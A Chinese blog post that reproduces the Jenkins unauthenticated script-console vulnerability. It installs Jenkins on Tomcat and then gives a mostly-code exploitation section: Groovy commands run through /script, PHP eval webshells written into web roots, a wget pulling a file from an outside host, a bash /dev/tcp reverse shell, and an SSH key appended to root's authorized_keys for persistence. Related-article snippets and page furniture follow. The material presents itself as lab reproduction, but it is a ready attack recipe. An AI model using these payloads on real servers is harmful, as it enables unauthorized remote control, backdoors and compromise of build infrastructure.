jenkins未授权访问漏洞复现

最新推荐文章于 2024-05-16 12:07:44 发布
最新推荐文章于 2024-05-16 12:07:44 发布
阅读量875 收藏 1
点赞数
分类专栏: 漏洞复现 文章标签: jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhangpeng999123/article/details/108227041
版权

1 安装jenkins

wget http://download.baiyongjie.com/deploy/jdk-8u45-linux-x64.tar.gz

wget http://download.baiyongjie.com/deploy/jenkins_2.121.2.war

wget http://download.baiyongjie.com/deploy/apache-tomcat-8.5.4.tar.gz

#安装jdk

tar zxvf jdk-8u45-linux-x64.tar.gz

mv  jdk1.8.0_45  /usr/local/

mv jdk-8u45-linux-x64.tar.gz  /usr/local/src/

#添加到系统的环境变量

cat >>/etc/profile << EOF

export JAVA_HOME=/usr/local/jdk1.8.0_45

export JRE_HOME=\${JAVA_HOME}/jre

export CLASSPATH=.:\${JAVA_HOME}/lib:\${JRE_HOME}/lib

export PATH=\${JAVA_HOME}/bin:\$PATH

EOF

#使profile文件生效,并查看java版本

source  /etc/profile   

java -version

#安装tomcat

tar zxvf apache-tomcat-8.5.4.tar.gz

mv apache-tomcat-8.5.4  /usr/local/jenkins

rm -rf /usr/local/jenkins/webapps/*

mv apache-tomcat-8.5.4.tar.gz  /usr/local/src/

#修改tomcat字符集,及端口

vim /usr/local/jenkins/conf/server.xml

    <Connector port="8080" URIEncoding="UTF-8" protocol="HTTP/1.1"

               connectionTimeout="20000"

               redirectPort="8443" />

#启动jenkins

mv jenkins_2.121.2.war  /usr/local/jenkins/webapps/jenkins.war

/usr/local/jenkins/bin/startup.sh

2 漏洞描述

默认情况下Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过未授权访问漏洞或者暴力破解用户密码等进脚本执行界面从而获取服务器权限。

3 漏洞利用

  1、Jenkins未授权访问可执行命令

 

http://192.168.22.54:8080/jenkins/manage

http://192.168.22.54:8080/jenkins/script

 

println "ifconfig -a".execute().text 执行一些系统命令

 

wget写shell:

 

new File("/var/www/html/jenkins1.php").write('<?php@eval($_POST[cmd]);?>');   1. println "wget http://shell.secpulse.com/data/t.txt -o /var/www/html/secpulse.php".execute().text

2. new File("/var/www/html/secpulse.php").write('<?php @eval($_POST[s3cpu1se]);?>');

3. def webshell = '<?php @eval($_POST[s3cpu1se]);?>'

new File("/var/www/html/secpulse.php").write("$webshell");

4. def execute(cmd) {

def proc = cmd.execute()

proc.waitFor()

}

execute( [ 'bash', '-c', 'echo -n "<?php @eval($" > /usr/local/nginx_1119/html/secpulse.php' ] )

execute( [ 'bash', '-c', 'echo "_POST[s3cpu1se]);?>" >> /usr/local/nginx_1119/html/secpulse.php' ] )

//参数-n 不要在最后自动换行

 

  2.执行命令尝试反弹shell

在对话框中尝试反弹shell,本地NC监听中,发行不行,尝试ping回来,发现网络不通,随即希望正想shell

 

     println 'bash -i >& /dev/tcp/192.168.22.34/4445 0>&1'.execute().text

 

3.上传自己的公钥

 

  println 'echo 公钥内容 >> /root/.ssh/authroized_keys'.execute().text

  ssh -i id_rsa 192.168.22.54

 

 

努力 现在开始
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
jenkins授权rce windows主机getshell
m0_46689007的博客
12-11 1348
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
execute()方法
热门推荐
Jinandawang的博客
06-13 7万+
方法execute: 用于执行返回多个结果集、多个更新计数或二者组合的语句。 因为多数程序员不会需要该高级功能。execute方法应该仅在语句能返回多个ResultSet对象、多个更新计数或ResultSet对象与更新计数的组合时使用。 当执行某个已存储过程 或动态执行知 SQL 字符串(即应用程序程序员在编译时知)时,有可能出现多个结果的情况,尽管这种情况很少见。因为方法 execut...
CVE-2024-23897 JenKins任意文件读取漏洞复现(1)
最新发布
2401_84519960的博客
05-16 651
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。恭喜你,如果学到这里,你基本可以从事一份网络安全相关的工作,比如渗透测试、Web 渗透、安全服务、安全分析等岗位;④主机攻防演练:MS17-010、MS08-067、MS10-046、MS12-20等。
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1776
Jenkins授权访问漏洞
CVE-2024-23897 JenKins任意文件读取漏洞复现,一个网络安全程序员的阿里面试心得
m0_60666921的博客
04-05 887
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!
漏洞复现----6、Jenkins远程命令执行漏洞(CVE-2018-1000861)
七天
11-25 4476
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
04-12 519
【代码】漏洞分析|死磕Jenkins漏洞回显与利用效果_jenkins 漏洞
jenkins修复最新Apache Struts远程代码执行漏洞(CVE-2016-1000031)
汇渊科技
07-18 4033
修复问题描述 阿里云上的安全监测提示: 近日,Apache软件基金会(ASF)向Apache Struts项目管理员发布了关于CVE-2016-1000031漏洞的安全公告,其中披露一个Commons FileUpload库的历史高危漏洞CVE-2016-1000031,而2.3.x系列版本的Apache Struts2仍在使用低版本的Commons FileUpload库,该库作为Struts...
修复 jenkins 漏洞 irqbalanc1
qyvlik的专栏
07-05 1310
修复 jenkins 漏洞 irqbalanc1
jenkins漏洞导致服务器中了挖矿病毒!cpu飙高351%!看我如何消灭它!
架构师小秘圈
05-14 5740
作者:SilentBillows,资深Java工程师,架构师小秘圈特约作者!欢迎大家投稿,在后台回复投稿即可!一, 定位问题1.发现cpu异常,查看对应的进程信息[roo...
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 9086
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
Jenkins凭据导出
Dancen的专栏
06-09 1496
Jenkins在调用svn、ssh等第三方工具时需要账号密码等信息。如果在调用第三方工具时在流水线脚本中直接传递这些敏感信息,既不方便,也有安全隐患。基于此,Jenkins可以将这些敏感信息存储为凭据,然后在项目中通过凭据ID引用,安全且便于复用。作为Jenkins管理员,某些情况下你可能面临账号密码等信息遗失的情况,或者你压根不知道其中的某些敏感信息,例如该信息由另外的系统管理员配置。此时,由于信息已被加密,你无法通过Jenkins的凭据管理直接查看到相关信息。如果需要查看这些敏感信息,需要借助Jenki
Tomcat下部署Jenkins无法打开(404)的解决办法
杨小扬的专栏
04-11 3万+
问题:http://localhost:8080/jenkins/打开时报出404错误,已知tomcat主页是可以打开的 1、查看jenkins根路径下logs文件夹 catalina.2016-04-11.log host-manager.2016-04-11.log localhost.2016-04-11.log localhost_access_log.201
jenkins授权访问漏洞记录(端口:7001,80,8080,50000)
墨痕诉清风的博客
11-12 1960
一、漏洞描述 授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。 二、漏洞环境搭建 docker pull docker.io/jenkins 开启服务(我执行的第一条命令即可) How to use this image docker run -p 8080:8080 -p 50000:50000 jenkins This will store the workspace
漏洞学习——授权访问】慧聪网Jenkins系统授权访问
Fly_鹏程万里
02-22 927
漏洞细节 http://58.252.73.136:8007/ (慧聪网询盘宝反馈活动) http://58.252.73.136:8001/login.aspx (慧聪家电城CRM系统) http://58.252.73.136:8080(jenkins管理后台,免密码访问) http://58.252.73.136:8080/script下执行cmd命令 println "ipconfi...
Jenkins高级篇之Pipeline语法篇-3-第一个Pipeline代码详细解释
Anthony_tester的博客
10-18 1万+
        前面一篇,我用Jenkins支持的脚本输入框执行构建,还用了github上拉取代码下来进行构建项目。这篇,就来详细解释下每行代码的含义,还有就是复习一下第一篇提到的几个关键字,这样的基础中的基础知识。 1.Declarative代码如下 pipeline { agent any stages { stage('Build') { ...
Jenkins授权访问漏洞
Kevin's Blog
07-31 1492
文章目录漏洞介绍环境配置配置主机下载安装漏洞利用防御建议 漏洞介绍 环境配置 配置主机 受害者IP:192.168.253.128 攻击者IP:192.168.1.102 系统内核版本: 下载安装 下载一: 镜像站下载(优点:下载快;缺点:不支持所有版本) https://mirrors.tuna.tsinghua.edu.cn/jenkins/redhat/ 下载二: 官方下载(优点:版本全;缺点:下载慢) 官方下载系统内核对应的安装包(这里是rpm包安装方式) http://mirrors
Jenkins 流水线语法进阶 Groovy 03 列表 list
小楼一夜听春雨,深巷明朝卖杏花
06-25 1987
列表list 列表的表示: [] [1,2,3,4] // list // 定义一个list def mylist = [1,2,3,4,4,"devops"] println(mylist) // list的元素增删 println(mylist + "jenkins") println(mylist - "devops") println(mylist << "java") def newlist = mylist.add("gitlab") println(newlist) /
Jenkins 脚本命令行应用总结
xuhss_com的博客
04-06 1407
Python微信订餐小程序课程视频 https://edu.csdn.net/course/detail/36074 Python实战量化交易理财系统 https://edu.csdn.net/course/detail/35475 Jenkins脚本命令行应用总结 测试环境 Jenkins 2.304 脚本命令行入口 Jenkins主页→系统管理→脚本命令行 遍历项目 例子:获取所有自由风格项目及相关项目信息 def projects = Jenkins.instance.projects.collect
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值